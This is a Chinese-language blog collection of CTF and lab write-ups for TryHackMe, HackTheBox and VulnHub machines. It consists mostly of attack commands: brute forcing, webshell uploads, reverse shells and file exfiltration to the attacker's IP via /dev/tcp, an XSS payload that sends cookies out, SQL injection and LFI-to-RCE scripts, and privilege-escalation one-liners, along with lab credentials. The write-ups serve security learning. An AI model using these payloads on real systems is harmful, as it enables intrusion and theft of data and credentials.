Recon

掃 Portrustscan -a 10.10.164.54 -r 1-65535
21
22
80nmap -A -p21,22,80 10.10.164.54-
FTP 可以匿名登入 !!觀察首頁-
沒啥東東dirsearch- 也沒啥東東

FTP 登入
裡面有兩ㄍ檔案都載下來FTP 檔案- 作者是 lin- 看起來是一個密碼表

爆破密碼

hydra -l 'lin' -P locks.txt ssh://10.10.164.54
帳號 : lin
密碼 : RedDr4gonSynd1cat3SSH 登入成功- 取得 user flag-

提權

起手式 sudo -l
發現可以用 sudo tarGTFOBins 尋找 tar sudo 提權- https://gtfobins.github.io/gtfobins/tar/#sudo
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh提權完畢，取得 root flag-

Overpass 3 (Try Hack Me Writeup)

Wed, 18 Aug 2021 13:10:00 +0800

URL : https://tryhackme.com/room/overpass3hosting

IP : 10.10.208.60

Recon

先掃 Portrustscan -a 10.10.208.60
嘗試 FTP Anonymous 登入-
發現不行觀察首頁- 掃目錄- python3 dirsearch.py -u http://10.10.208.60/
/backups/
找到一包 Backup

GPG 解密

觀察 Backupwget http://10.10.208.60/backups/backup.zip
裡面有兩個檔案
gpg 加密後的檔案跟它的 keygpg --import priv.key
gpg --output ./a.xlsx --decrypt ./CustomerDetails.xlsx.gpg解開後是一個 Excel 表格-
paradox:ShibesAreGreat123
0day:OllieIsTheBestDog
muirlandoracle:A11D0gsAreAw3s0me

爆破密碼

有一連串的帳號跟密碼，試著用 Hydra 爆破 SSHhydra -L user.txt -P pass.txt ssh://10.10.208.60
發現 SSH 不能用密碼登入試著爆破 FTP- hydra -L user.txt -P pass.txt ftp://10.10.208.60
找到了一組帳密可以使用paradox:ShibesAreGreat123

FTP 2 Webshell

嘗試登入 FTP
發現看起來是 webroot
放隻 Webshell 上去
put webshell.php
發現成功惹!!使用 Webshell-
放 Reverse shellhttp://10.10.208.60/webshell.php?A=curl%20-o%20%20/tmp/s%2010.13.21.55:8000/s
本地開 nc -nlvp 7877
http://10.10.208.60/webshell.php?A=bash%20/tmp/s
收到 Reverse shell

提權

轉互動式 shellpython3 -c 'import pty; pty.spawn("/bin/bash")'找 Web Flag- find / -iname '*flag*' -print 2>/dev/null
找到在 /usr/share/httpd/web.flagthm{0ae72f7870c3687129f7a824194be09d}準備 Linpeas- curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh
bash linpeas.shSudo version 1.8.29發現 nfs 很可疑，但我們先繼續看下去-
https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe發現幾個檔案可以 setuid-
但都不能利用發現 nfs 如果需要利用，需要用 showmount，但電腦裡沒有- 自己載一包來放著
curl -o ./showmount http://10.13.21.55:8000/showmount
但 run 起來都失敗 QQ發現根目錄有奇怪的檔案- /.autorelabel
用 nc 傳出來觀察
cat .autorelabel > /dev/tcp/10.13.21.55/1234
發現裡面是空的 QQ突然想到可能可以切換使用者- 因為前面我們 Excel 有密碼
su paradox
切換使用者成功

二次提權

基本上我們猜測接下來就要使用 nfs 的漏洞，但是我們一開始 nfs 在掃 port 時並沒有掃到，因此猜測它只開在 local，我們來掃掃看 local 的 port準備 nmap binaryhttps://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap掃下去-
找到 nfs 開在 2049 port觀察發現 paradox 的 .ssh 只有 public key-
好ㄉ沒啥用 = =本地端有開 nfs 但我們權限很低，那我們可以把 nfs 給用 port forwarding 打出來，使用 chisel- https://github.com/jpillora/chisel
curl http://10.13.21.55:8000/chisel -o chisel
chmod +x chisel輸入指令- 攻擊機 : ./chisel server --reverse -p 7414靶機 : ./chisel client 10.13.21.55:7414 R:2049:127.0.0.1:2049- 用 nmap 掃攻擊機看看有沒有真的打通- 把 nfs mount 到本機- sudo mount -t nfs localhost:/ mount/
發現 mount 成功-
裡面有 ssh 的 key，所以我們可以複製出來直接用 james 的 ssh 進行登入
也找到了 User 的 Flag在攻擊機 mount 的 nfs 目錄- 直接複製自己的 /bin/bash
給它 +s 提供 suid再用 james 進行執行-
發現怎麼還是 james QQ再回來攻擊機 chown 把 bash 的 owner 改 root- 就可以ㄌ!!Root flag- thm{a4f6adb70371a4bceb32988417456c44}

學到ㄌ

Port forwarding
NFS 提權
SUID 要 own=root才能用

The Marketplace (Try Hack Me Writeup)

Tue, 17 Aug 2021 13:27:00 +0800

URL : https://tryhackme.com/room/marketplace

IP : 10.10.74.8

Recon

首先先掃 Portrustscan -a 10.10.74.8 -r 1-65535
有開 22 80 32768nmap -A -p22,80,32768 10.10.74.8- 觀察首頁-
感覺滿廉價ㄉQQ掃目錄- python3 dirsearch.py -u http://10.10.74.8/``robots.txt
login
signup
嘗試註冊-
meow / meow嘗試貼文-
發現下面說不能PO檔案，感覺有埋梗用 F12 把 disable 拔掉再測- 觀察 robots.txt- 觀察 Session-
看起來很 Base64eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibWVvdyIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjI5MDk5NDQwfQ.6MNSd_Wf1ytqceTjhWWGEbB4AhzTHFshHCLIeVF_Zeo
解碼後看起來是 JWT{"alg":"HS256","typ":"JWT"}{"userId":4,"username":"meow","admin":false,"iat":1629099440}5'YrN8VXa!1Ų,^

XSS

發現 Po 文處可以 XSS寫 Payload 偷餅乾- new Image().src="http://10.13.21.55:1234/"+document.cookie
回報給管理員- 用 nc -l 1234 來接-
收到管理員的餅乾GET /token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjkxMDAxOTN9.f-eVVqF1AnFJEeuam97hn-Xz3fFNbQAJYTKrsDukzrU HTTP/1.1使用管理員帳號登入- 把自己的餅乾換成管理員的首頁- 取得 Flag1- THM{c37a63895910e478f28669b048c348d5}

SQLi

發現看使用者這邊可以用 SQL injection點進去之後，透過 F12 複製成 curl 再轉 python 的 request-
測了一陣子發現空白要用 /**/ 來繞"-1/**/UNION/**/SELECT/**/1,2,3,4/**/--")爆 db- p = "-1 UNION SELECT 1,group_concat(schema_name),3,4 FROM information_schema.schemata --"
兩個 DBinformation_schema
marketplace先關注這個爆 table- p = "-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables where table_schema='marketplace' --"
發現有三張 tableitems
messages
users爆 column- p = "-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns where table_schema='marketplace' --"
id,author,title,description,image,id,user_from,user_to,message_content,is_read,id,username,password,isAdministrator應該需要觀察的是 username 跟 password選帳號- p = "-1 UNION SELECT 1,group_concat(username),3,4 FROM marketplace.users --"
jake,meow,michael,system
選密碼- p = "-1 UNION SELECT 1,group_concat(password),3,4 FROM marketplace.users --"
看起來有過 hash
把他大致整理一下$2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW, $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG $2b$10$FStzuEGFk9JpOnigl2gbEuE2rRp27psGUS0UuztTtxbZPFW/Wtn4m
查詢發現是 bcrypthttps://bcrypt-generator.com/
而且可以測試其中一個是我自己註冊的 meow
爆密碼- john password_hash.txt --wordlist=/opt/rockyou.txt
hashcat -m 3200 password_hash.txt rockyou.txt
中研院超級電腦的兩張 V100 吃滿要跑 3 小時，不太合理繼續 SQLi- p = "-1 UNION SELECT 1,group_concat(message_content),3,4 FROM marketplace.messages --"
噴出以下內容User Hello! An automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password. Your new password is: @b_ENXkGYUCAv3zJ,<script>alert(1)</script>,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.,Thank you for your repor
看到一段看起來很像密碼的東西@b_ENXkGYUCAv3zJ

SSH

我們有 3 個 userjake
michael
system雖然可以徒手戳一下就好，但我今天想用 Hydra- hydra -L user.txt -P password.txt ssh://10.10.74.8
噴出的結果是 jakejake : @b_ENXkGYUCAv3zJSSH 登入成功-
取得 user keyTHM{c3648ee7af1369676e3e4b15da6dc0b4}

提權

起手式先 sudo -l 一波
看起來是很老梗的 sudo 備份ㄇ如果是的話我們只要戳個 Reverse shellecho "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /opt/backups/backup.sh就可以打完收工ㄌ但前題是我們需要有權限修改這個 sh- 看樣子不行QQ，我們不是賣口 QQ準備 Linpeas- wget 10.13.21.55:8000/linpeas.sh
發現 sudo version 1.8.21p2https://www.exploit-db.com/exploits/47502
但看起來不好用發現一包 backup 檔案-
用 nc 傳出來nc -l 1234 > backup.tar
cat backup.tar > /dev/tcp/10.13.21.55/1234
發現裡面都空ㄉㄍ騙我
回想起 backup.sh 他後面接了一個 *- 這個時候可以套用 tar-wildcard-injectionref : https://mqt.gitbook.io/oscp-notes/tar-wildcard-injection
簡單來說 tar 會把後面的 * 的東西直接串起來當指令執行echo a > '--checkpoint=1'``echo a > '--checkpoint-action=exec=sh script.sh'echo whoami > script.sh用賣口權限執行- sudo -u michael /opt/backups/backup.sh
發現可以成功!!!
切換到賣口- echo bash > script.sh

二次提權

再一次 Linpeas發現 /var/run/docker.sock 可以寫入-
直接給我們 Exploit 教學ㄌ，好棒https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket觀察目前有使用的 docker image- 修改一下 image 的名字，使用 hacktricks 上面的 exploit 教學- docker -H unix:///var/run/docker.sock run -v /:/host -it nginx chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host nginx nsenter -t 1 -m -u -n -i sh創建 privileged 康天呢提權成功-

Source (Try Hack Me Writeup)

Mon, 16 Aug 2021 13:21:00 +0800

URL : https://tryhackme.com/room/source
IP : 10.10.63.154

Scan

掃 Portrustscan -a 10.10.63.154 -r 1-65535
22
10000nmap -A -p22,10000 10.10.63.154-
發現 10000 是 MiniServ 1.890直接連上去- http://10.10.63.154:10000/
發現它有綁 SSL 要用指定網址才能進10.10.63.154 ip-10-10-63-154.eu-west-1.compute.internal
綁上 /etc/hosts再次訪問-

Exploit

透過版本可以查詢到 MiniServ 1.890 Exploithttps://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py
wget https://raw.githubusercontent.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/master/webmin-1.890_exploit.py
python3 webmin-1.890_exploit.py
ㄟ就直接拿到 root 了ㄟ
太無聊ㄌㄅ = =懶得戳 Reverse shell ㄌ- 直接用這個類似 Webshell 的東西早點打完收工ㄅ
Root FlagTHM{UPDATE_YOUR_INSTALL}取 User Flag- 先看 home 使用者名稱看使用者資料夾- 取得 Flag-

Seal (Hack The Box Writeup)

Sun, 15 Aug 2021 14:05:00 +0800

URL: https://app.hackthebox.eu/machines/Seal

IP : 10.10.10.250

Recon

凡事都先從掃 Port 開始rustscan -a 10.10.10.250 -r 1-65535找到 22 443 8080nmap -A -p22,443,8080 10.10.10.250-
443 : nginx 1.18觀察 443 的 HTTPS 憑證-
網址應該是 seal.htb
加到 /etc/hosts``10.10.10.250 seal.htb觀察首頁- 443 port8080 port-
看起來是一個 Bit Bucket掃目錄- python3 dirsearch.py -u https://seal.htb/
發現有一些頁面 302 按進去又 404
而且首頁 nmap 明明就說是 nginx 這邊下面錯誤訊息卻跳 Tomcatapache tomcat 9.0.31 ??- nginx 1.18.0觀察 Bitbucket- 發現可以註冊帳號
meow / meow
成功登入-

Hack Tomcat

可以發現原始碼與 Config 檔案都放在這邊
在 commit log 中可以找到 tomcat 帳密
tomcat
42MrHBf*z8{Z%嘗試進入 Tomcat 後台，卻發現 403- https://seal.htb/admin/dashboard
但發現 Tomcat 的 Status 可以用- https://seal.htb/manager/status/all
繼續翻 nginx 的 config- 發現他針對 nginx 有設定一個 ssl_client_verify這邊可以用 Orange 曾經介紹過的手法- 第 48 頁也就是網址透過 ..; 截斷- https://seal.htb/manager/status/..;/html
就成功進入湯姆貓後台ㄌ!!Tomcat 的後臺如果可以進入的話，代表可以上傳 jsp 的 webshell- 這邊我採用這個https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmd.jspwget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp``jar -cvf cmd.war cmd.jsp然後在這邊上傳- 上傳時仍然要注意 Bypass Path 的問題- Post 的路徑要是 POST /manager/status/..;/html/upload
這邊我用 Burp 來處理
Web Shell 上傳成功-
https://seal.htb/cmd/cmd.jsp
也可以亂輸入指令ㄌ接下來準備 Reverse shell- wget 10.10.16.5:8000/s_HTB -O /tmp/s
確定真的有載到準備 nc -vlk 7877 來接bash /tmp/s- 成功收到!!

提權

發現 user flag 沒有權限發現 /var/www/keys 裡面有一些 key- 不管，先打包回家慢慢看
tar cvf /tmp/keys.tar .
用 nc 把檔案送回家
發現自簽憑證在裡面!-
/var/www/keys/selfsigned-ca.crt;那理論上我們可以用我們的瀏覽器綁自簽憑證ㄇ- 依照這邊的方法https://www.jscape.com/blog/firefox-client-certificateQAQ 看起來是不行嘗試 Linpeas-
找到一個很新的備份檔案- /opt/backups/archives/backup-2021-08-14-09:44:35.gz
觀察備份檔路徑，發現會備份- /var/lib/tomcat9/webapps/ROOT/admin/dashboard
是使用 ansiple-playbook 進行備份的可以用 ps 觀察到
他是用 luis 的權限執行的這邊可以先注意一下 copy link = yes- 等一下會運用到觀察 ansible-playbook- /usr/bin/ansible-playbook
到 /usr/bin``ls -al | grep ansible-playbook
ls -al | grep ansible
發現他會 link 到一個Python 檔案裡面滿複雜的，應該不會要去 Exploit 他ㄅQQ- 而且相關目錄我們也都沒有權限開始通靈- 發現使用者的家目錄有一個 .ssh
猜他裡面可能有 id_rsa 可以偷
而 ansible-playbook 又可以備份 Link
所以我們可以把檔案 soft link 到備份的地方發現備份的目錄的 uploads 可寫-
ln -s /home/luis/.ssh/id_rsa id_rsa等待 30 秒產出新的備份檔案-
用 nc 帶回家nc -l -p 1234 > backup.gz
cat backup-2021-08-14-10:21:33.gz > /dev/tcp/10.10.16.5/1234發現真的有 id_rsa-
是 OpenSSH 的 private key

使用者提權

使用 SSH 登入ssh luis@seal.htb -i id_rsa
取得 User Flag- sudo -l 提權起手式-
發現可以使用 ansible-playbookGTFOBins 搜尋- 找到了 ansible-playbook 提權方法https://gtfobins.github.io/gtfobins/ansible-playbook/#sudoTF=$(mktemp)``echo '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/dev/tty]}]' >$TF``sudo ansible-playbook $TF取得 Root Flag-
b4890611a188410400d56e578f30979e

心得

對於湯姆貓還是有一點陌生QQ，包含傳 jsp webshell 等部分，還有目錄截斷之類的也要多研究一下，這一題我覺得除了通靈 id_rsa 之外，整體來講題目滿好玩的！

Corrosion (VulnHub Writeup)

Sat, 14 Aug 2021 23:19:00 +0800

URL : https://www.vulnhub.com/entry/corrosion-1,730/

IP : 35.229.145.176

Recon

掃 Portrustscan -a 35.229.145.176 -r 1-65535nmap -A -p80,22 35.229.145.176- 掃路徑- python3 dirsearch.py -u 35.229.145.176只掃到 /tasks/裡面有一個 todo list
換不同的 dict- python3 dirsearch.py -u http://35.229.145.176/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt掃到 /blog-post
http://35.229.145.176/blog-post/繼續掃- python3 dirsearch.py -u http://35.229.145.176/blog-post/找到 archives
裡面有一個 php

LFI 2 RCE

通靈到可以用 ?file 來做 LFIhttp://35.229.145.176/blog-post/archives/randylogs.php?file=php://filter/convert.base64-encode/resource=randylogs.phpPD9waHAKICAgJGZpbGUgPSAkX0dFVFsnZmlsZSddOwogICBpZihpc3NldCgkZmlsZSkpCiAgIHsKICAgICAgIGluY2x1ZGUoIiRmaWxlIik7CiAgIH0KICAgZWxzZQogICB7CiAgICAgICBpbmNsdWRlKCJpbmRleC5waHAiKTsKICAgfQogICA/Pgo=``php http://35.229.145.176/blog-post/archives/randylogs.php?file=../../../../../../../etc/passwd- 根據題目提示說 auth.log 沒關- http://35.229.145.176/blog-post/archives/randylogs.php?file=../../../../../../../var/log/auth.logauth.log 會把 ssh 登入的帳號給紀錄- ssh 'meow@35.229.145.176'
寫 phpinfo- ssh '@35.229.145.176'
寫 shell- ssh '@35.229.145.176'
http://35.229.145.176/blog-post/archives/randylogs.php?file=../../../../../../../var/log/auth.log&A=id
戳 reverse shell- bash -c 'bash -i >& /dev/tcp/35.201.246.140/7877 0>&1'
wget 35.201.246.140:8000/s
http://35.229.145.176/blog-post/archives/randylogs.php?file=../../../../../../../var/log/auth.log&A=wget%2035.201.246.140:8000/s -O /tmp/s
http://35.229.145.176/blog-post/archives/randylogs.php?file=../../../../../../../var/log/auth.log&A=bash /tmp/s
補充，喵策會解法，LFI 無限制 RCE (PHP_SESSION_UPLOAD_PROGRESS)

import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = 'http://35.229.145.176/blog-post/archives/randylogs.php'
param = "file"

# code = "file_put_contents('/tmp/shell.php','& /dev/tcp/{domain}/{port} 0>&1'");'''

while True:
 req = [grequests.post(base_url,
 files={'f': "A"*0xffff},
 data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:"},
 cookies={'PHPSESSID': sess_name}),
 grequests.get(f"{base_url}?{param}={sess_path}")]

 result = grequests.map(req)
 if "pwned" in result[1].text:
 print(result[1].text)
 break

進入 Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
直接 sudo -l 嘗試提權
需要密碼準備 LinEnum- wget 35.201.246.140:8000/LinEnum.sh
找到一個可疑檔案有 SGID-
傳出可疑檔案分析- 本機 nc -l -p 1234 > write.ul
靶機 cat /usr/bin/write.ul > /dev/tcp/35.201.246.140/1234用 IDA 觀察-
看起來不像是需要逆的東西 QQ
再繼續觀察準備 Linpeas-
找到備份檔案-
裡面有密碼傳出來- cat user_backup.zip > /dev/tcp/35.201.246.140/1234用約翰爆破 zip- zip2john user_backup.zip > j
john j --wordlist=/opt/rockyou.txt
取得密碼為 !randybaby解壓縮，取得密碼-
randylovesgoldfish1998透過 ssh 登入- 帳號 randy
密碼 ``randylovesgoldfish1998`取得 userflag-

二次提權

sudo -l 起手式
觀察先前壓縮檔中的程式
因為他是 sudo 所以無法做 path 的汙染QQ觀察檔案權限-
發現他有 suid，所以不用sudo就可以用 PATH 汙染 cat 了!echo "bash -c 'bash -i >& /dev/tcp/35.201.246.140/7878 0>&1'" > cat``chmod +x cat``PATH=/home/randy/fakepath:$PATH /home/randy/tools/easysysinfo收 reverse shell- 取得 root flag-

心得

學到了喵策會的 LFI 大絕招；除了 sudo 外還要在意 SUID，看樣子常常忘東忘西可能要來準備 Check list 了QQ

Cap (Hack The Box Writeup)

Sat, 14 Aug 2021 13:50:00 +0800

URL : https://app.hackthebox.eu/machines/351

IP : 10.10.10.245

Recon

剛開始先掃 Portrustscan -a 10.10.10.245 -r 1-65535nmap -A -p21,22,80 10.10.10.245- 觀察有開的 port- 22
21 : vsFTPd 3.0.3
80掃路徑- python3 dirsearch.py -u http://10.10.10.245/
基本上都還是跳轉回首頁，沒什麼 QQ觀察首頁- 觀察下載的 /data 發現預設是從 2 開始- 嘗試改 1 會出現空白
嘗試改 0http://10.10.10.245/data/0
可以下載到一包 pcap 檔案分析 pcap 檔案-
可以找到 ftp 的登入帳密nathan
Buck3tH4TF0RM3!

進入系統

直接 ssh 連上取得 user flag-

提權

準備 LinEnum執行 LinEnum- bash LinEnum.sh
發現 python3 有 capability- GTFOBins 尋找 Py capability 解法- https://gtfobins.github.io/gtfobins/python/#capabilities
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'取得 Root Shell 與 Flag-

Bounty Hunter (Hack The Box Writeup)

Fri, 13 Aug 2021 13:42:00 +0800

URL : https://app.hackthebox.eu/machines/359

IP : 10.10.11.100

Recon

凡事都從掃 Port 開始rustscan -a 10.10.11.100 -r 1-65535
有開 22 80 port掃路徑- python3 dirsearch.py -u http://10.10.11.100/
發現有一個 /db.php進去是空白的還有一個 /resources/-
其中 README.txt 裡面有一些小線索發現發送表單頁面有 XXE 漏洞- 直接用 js 在 F12 Console 發

async function bountySubmit() {
 try {
 var xml = `
 ]>

 &b;
 456
 meow
 321
 `
 let data = await returnSecret(btoa(xml));
 $("#return").html(data)
 }
 catch(error) {
 console.log('Error:', error);
 }
}
bountySubmit()

Anonymous (Try Hack Me Writeup)

Wed, 11 Aug 2021 23:46:00 +0800

URL : https://tryhackme.com/room/anonymous

IP : 10.10.142.45

Recon

掃 Port 起手式rustscan -a 10.10.142.45 -r 1-65535 --ulimit 500022
21
139
445nmap -A -p21,22,139,445 10.10.142.45- 21 : FTPVSFTPD 2.0.822 : SSH139: SMB445: SMB嘗試連接 ftp- ftp 10.10.142.45 使用 anonymous 登入
發現裡面有一個 scripts 資料夾先把裡面所有檔案都載下來
觀察檔案- clean.sh看起來是一段清除資料的 bash script
removed_files.log- 看起來東西都是空的，是上述腳本的輸出
to_do.txt- 看起來沒有很重要
嘗試連線 SMB- 發現有一個 pics 資料夾裡面有兩張圖片- 把兩張圖片載下來- 觀察圖片- 看起來是狗勾!用 Exif tool 觀察-
可以看出 Photoshop 編輯過後來還用了 steghide 等程式，都沒有結果

嘗試 Exploit

尋找到 Vsftpd 2.3.4 有 Exploithttps://www.exploit-db.com/exploits/49757
wget https://www.exploit-db.com/download/49757 -O 49757.py
發現他是 Anonymous only，所以這個 Exploit 不能用!!
用了 msf 也是一樣的結果 QQ突然想到，說不定 ftp 上面的 clean.sh 是一個 cron job- 我們既然有讀寫的權限，可以在上面戳個 reverse shell 再傳上去
echo bash -c "'bash -i >& /dev/tcp /10.13.21.55/7877 0>&1'" >> clean.sh
本地端開 nc 來接成功接上ㄌ-
取得 User flag

提權

起手式 sudo -l看起來沒東西 QQ
準備 Linenum- wget 10.13.21.55:8000/LinEnum.sh
掃到了 /usr/bin/env 有 suid
透過 GTFOBins 尋找 env SUID 提權- /usr/bin/env /bin/sh -p成功提權-
取得 Root Flag

心得

FTP 上面的檔案也有可能是 Cron Job，看到 shell 就優先懷疑它是 cron ，看看能不能戳一些東西上去。打 Exploit 前須要先確定一下他有沒有一些限制(FTP的不能是 Anonymous登入)。

Previse (Hack The Box Writeup)

Wed, 11 Aug 2021 14:04:00 +0800

URL : https://app.hackthebox.eu/machines/373
IP : 10.129.212.165

Recon

掃 Portrustscan -a 10.129.212.165
發現有開 22 跟 80
掃目錄- python3 dirsearch.py -u http://10.129.212.165/
基本上沒有什麼有趣的東西不過有發現有滿多的目錄都會被導到 login.php
先事後諸葛的講一下，注意他們的302檔案大小不同
隨便點開幾個沒有關 index of 的目錄
看不出什麼

準備 Exploit

其實 Recon 玩之後，我就走投無路的卡了兩個小時，途中包含嘗試了 hydra 爆破hydra -L user.txt -P /opt/rockyou.txt 10.129.212.165 http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed:login.php"後來發現了他們的 302 大小不同- 這叫做 Execute After Redirect (EAR) 感謝唉嗚提供!
可以用 Burp 把 Response 也抓包抓起來
並徒手把 301 的 Redirect 改回 200就可以直接在不登入的狀況下訪問各種目錄了- 這算 OWASP TOP 10 的 A2-Broken Authentication
我們先創一個自己的帳號然後進去亂晃其中在檔案下載的地方，有網頁的原始碼- 可以在 logs.php發現一個明顯的 Command injection 漏洞，但它貌似不會回顯![](/uploads/2022/02/51a0f-QdUn7fX.png)使用 Command injection- curl ‘http://10.129.212.165/logs.php’ -H ‘User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0’ -H ‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8’ -H ‘Accept-Language: en-US,en;q=0.5’ –compressed -H ‘Content-Type: application/x-www-form-urlencoded’ -H ‘Origin: http://10.129.212.165’ -H ‘Connection: keep-alive’ -H ‘Referer: http://10.129.212.165/file_logs.php’ -H ‘Cookie: PHPSESSID=g5ssm562il8nfcv9fj771ma1nd’ -H ‘Upgrade-Insecure-Requests: 1’ –data-raw ‘delim=comma;curl -o /tmp/s 10.10.14.47:8000/s_HTB ‘`
成功載下了我們的 rever sehellbash -c 'bash -i >& /dev/tcp/10.10.14.47/7877 0>&1'
也成功執行起來ㄌ curl 'http://10.129.212.165/logs.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.129.212.165' -H 'Connection: keep-alive' -H 'Referer: http://10.129.212.165/file_logs.php' -H 'Cookie: PHPSESSID=g5ssm562il8nfcv9fj771ma1nd' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'delim=comma;bash /tmp/s'

一次提權

發現我們不能 cat user flag觀察 sudo -l- 我們不能用 sudo 做任何事情
從 config.php 可以找到資料庫名稱跟密碼-

$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;

嘗試把 sql 給 dump 出來mysqldump -u root -h localhost -p previse > a.sql
再載下來wget 10.129.212.165/a.sql
可以觀察到一段帳號跟使用者密馬 hash-
m4lwhere','$1$ðŸ§‚llol$DQpmdvnb7EeuO6UaqRItf.'
使用 Hash Analyzer分析
發現是 MD5-Crypt而我自己的使用者密碼也在資料庫中，發現到他們的 Salt 一樣-
直接破會發現解不開 QQ
觀察原始碼發現它的 salt 是固定的，而且用了 Unicode 的 Emoji-
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.重新修正後就可以用 john 來解ㄌ!- 另外這邊也可以用 Hash Cat 來解- hashcat -m 500 hash.txt rockyou.txt
可以觀察 Hash cat 的網站，尋找 MD5-Crypt 的代號是 500https://hashcat.net/wiki/doku.php?id=example_hashes因此我們就取的了一組帳密- m4lwhere
ilovecody112235!也可以順利的 SSH 上去了- 取得 User Flag-
aad354dc018b14716dee8310d8f90c03

準備二次提權

起手式 sudo -l
發現我們可以用 sudo 執行 access_backup.sh
但是我們不行對這個檔案進行寫入發現程式會呼叫 date 的相對位置- 所以我們可以用 Path 誤導程式，執行我們的腳本
在本地家目錄創一個 date 檔案，設定 x 權限並寫入 Reverse shellbash -c 'bash -i >& /dev/tcp/10.10.14.47/7878 0>&1'!執行 PATH=/home/m4lwhere:$PATH sudo /opt/scripts/access_backup.sh順利取得 Root!!-

Knife (Hack The Box Writeup)

Wed, 11 Aug 2021 13:59:00 +0800

URL : https://app.hackthebox.eu/machines/347

IP : 10.10.69.238

Recon

掃 Portrustscan -a 10.10.69.238 -r 1-65535
有開 80 跟 443觀察 Wappalyzer- Apache 2.4.41
PHP8.1.0掃目錄- python3 dirsearch.py -u http://10.10.10.242/
看起來沒有東西 QQ

Exploit

找到 php 8.1.0 有 RCE 漏洞https://github.com/flast101/php-8.1.0-dev-backdoor-rce
git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce執行起來-
就成功拿到 Shell ㄌ也可以執行另外一個 reverse shell 版本-
取得 user.txt-

提權

起手式 sudo -l
發現我們可以用 sudo knifeGTFOBins 尋找刀子的 sudo 提權- sudo knife exec -E 'exec "/bin/sh"'
就提權成功ㄌ
取得 Root Flag-

心得

這題提醒我們，還是需要優先確認各種服務的版本號。

Relevant (Try Hack Me Writeup)

Tue, 10 Aug 2021 13:13:00 +0800

URL : https://tryhackme.com/room/relevant

IP : 10.10.115.198

Recon

rustscan -a 10.10.115.198發現有開80
135
139
445
3389nmap -A 10.10.115.198

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 01:58 EDT
Nmap scan report for 10.10.115.198
Host is up (0.28s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2021-08-09T06:00:45+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-08-08T05:57:43
|_Not valid after: 2022-02-07T05:57:43
|_ssl-date: 2021-08-09T06:01:24+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-os-discovery:
